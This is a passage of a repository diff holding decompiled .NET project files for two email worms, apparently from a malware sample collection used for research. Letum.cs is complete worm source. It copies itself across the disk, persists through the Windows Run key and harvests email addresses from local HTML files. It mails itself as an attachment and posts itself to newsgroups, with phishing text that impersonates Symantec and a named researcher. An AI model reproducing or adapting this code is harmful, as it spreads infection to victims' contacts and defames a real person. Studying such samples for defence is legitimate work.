Mcafee.Properties.Resources.resourceMan = new ResourceManager("Mcafee.Properties.Resources", typeof (Mcafee.Properties.Resources).Assembly);
return Mcafee.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Mcafee.Properties.Resources.resourceCulture;
set => Mcafee.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Settings
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Email-Worm.MSIL.Letum.a.csproj
+47
View File
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Email-Worm.MSIL.Letum.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.csproj", "{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Form1.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Letum22/Letum.cs
+259
View File
@@ -0,0 +1,259 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index = random.Next(0, arrayList.Count);
object obj2 = arrayList[index];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
string str1 = Letum.nSubject[random.Next(0, Letum.nSubject.Length)];
string str2 = Letum.nData[random.Next(0, Letum.nData.Length)] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Properties/Resources.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Email-Worm/MSIL/L/Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079/Properties/Settings.cs
+19
View File
